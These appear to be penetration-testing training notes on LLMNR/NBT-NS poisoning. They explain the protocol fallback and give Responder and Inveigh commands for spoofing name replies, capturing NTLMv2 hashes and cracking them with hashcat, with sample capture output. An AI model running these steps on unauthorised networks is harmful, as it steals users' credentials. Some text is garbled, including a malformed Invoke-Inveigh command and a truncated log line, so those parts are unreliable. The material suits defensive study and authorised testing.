LLMNR/NBT-NS Poisoning
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification that can be used when DNS fails.
If a machine attempts to resolve a host but DNS resolution fails, typically, the machine will try to ask all other machines on the local network for the correct host address via LLMNR. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts.
It uses port 5355 over UDP natively. If LLMNR fails, the NBT-NS will be used. NBT-NS identifies systems on a local network by their NetBIOS name. NBT-NS utilizes port 137 over UDP.
The kicker here is that when LLMNR/NBT-NS are used for name resolution, ANY host on the network can reply. This is where we come in with Responder to poison these requests.
How does a typical attack work
- A host attempts to connect to the print server at \print01.inlanefreight.local, but accidentally types in \printer01.inlanefreight.local.
- The DNS server responds, stating that this host is unknown.
- The host then broadcasts out to the entire local network asking if anyone knows the location of \printer01.inlanefreight.local.
- The attacker (us with
Responderrunning) responds to the host stating that it is the \printer01.inlanefreight.local that the host is looking for. - The host believes this reply and sends an authentication request to the attacker with a username and NTLMv2 password hash.
- This hash can then be cracked offline or used in an SMB Relay attack if the right conditions exist.
Tools
Several tools can be used to attempt LLMNR & NBT-NS poisoning:
| Tool | Description |
|---|---|
| Responder | Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions. |
| Inveigh | Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks. |
| Metasploit | Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks. |
From Linux
Responder
Listening with responder
sudo responder -I ens224 -A -wf
# sudo privileges or root to make sure that all ports needed are available on our attack host for it to function best.
# -w: The use of the -w flag utilizes the built-in WPAD proxy server. This can be highly effective, especially in large organizations, because it will capture all HTTP requests by any users that launch Internet Explorer if the browser has Auto-detect settings enabled.
# -f: attempts to fingerprint the remote host operating system and version.
With this configuration shown above, Responder will listen and answer any requests it sees on the wire.
All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/).
NetNTLMv2 hashes are very useful once cracked, but cannot be used for techniques such as pass-the-hash, meaning we have to attempt to crack them offline with hashcat or johntheripper. For example, in the case of a NetNTLMv2 hash, we can copy the hash to a file and attempt to crack it using the hashcat module 5600.
See hashcat for other modules beside 5600.
Hashes are also stored in a SQLite database that can be configured in the
Responder.confconfig file, typically located in/usr/share/responderunless we clone the Responder repo directly from GitHub.
From Windows
Inveigh
https://github.com/Kevin-Robertson/Inveigh
Mitre ATT&CK lists this technique as ID: T1557.001, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay.
LLMNR & NBT-NS poisoning is possible from a Windows host as well.
Inveigh is a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers. The repo contains the primary C# version as well as the legacy PowerShell version.
Inveigh can listen to IPv4 and IPv6 and several other protocols, including LLMNR, DNS, mDNS, NBNS, DHCPv6, ICMPv6, HTTP, HTTPS, SMB, LDAP, WebDAV, and Proxy Auth.
Powershell version
The PowerShell version of Inveigh is the original version and is no longer updated. The tool author maintains the C# version (in the belowed section). Configurable parameters in inveigh: https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters
# Install the module
Import-Module .\Inveigh.ps1
# List parameters
(Get-Command Invoke-Inveigh).Parameters
# Start Inveigh with LLMNR and NBNS spoofing, and output to the console and write to a file.
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
C# Inveigh (InveighZero)
Before we can use the C# version of the tool, we have to compile the executable.
Results:
[*] Inveigh 2.0.4 [Started 2022-02-28T20:03:28 | PID 6276]
[+] Packet Sniffer Addresses [IP 172.16.5.25 | IPv6 fe80::dcec:2831:712b:c9a3%8]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.16.5.25 | IPv6 fe80::dcec:2831:712b:c9a3%8]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Tools]
[+] Previous Session Files (Not Found)
[*] Press ESC to enter/exit interactive console
[!] Failed to start HTTP listener on port 80, check IP and port usage.
[!] Failed to start HTTPv6 listener on port 80, check IP and port usage.
[ ] [20:03:31] mDNS(QM)(A) request [academy-ea-web0.local] from 172.16.5.125 [disabled]
[ ] [20:03:31] mDNS(QM)(AAAA) request [academy-ea-web0.local] from 172.16.5.125 [disabled]
[ ] [20:03:31] mDNS(QM)(A) request [academy-ea-web0.local] from fe80::f098:4f63:8384:d1d0%8 [disabled]
[ ] [20:03:31] mDNS(QM)(AAAA) request [academy-ea-web0.local] from fe80::f098:4f63:8384:d1d0%8 [disabled]
[+] [20:03:31] LLMNR(A) request [academy-ea-web0] from 172.16.5.125 [response sent]
[-] [20:03:31] LLMNR(AAAA) request [academy-ea-web0] from 172.16.5.125 [type ignored]
[+] [20:03:31] LLMNR(A) request [academy-ea-web0] from fe80::f098:4f63:8384:d1d0%8 [response sent]
[-] [20:03:31] LLMNR(AAAA) request [academy-ea-web0] from
[+]default option and enabled by default[ ]disabled options .
Console access:
Press ESC to enter/exit interactive console. The console gives us access to captured credentials/hashes, allows us to stop Inveigh, and more.
# List commands
> HELP
# view unique captured hashes
> GET NTLMV2UNIQUE
# see which usernames we have collected.
GET NTLMV2USERNAMES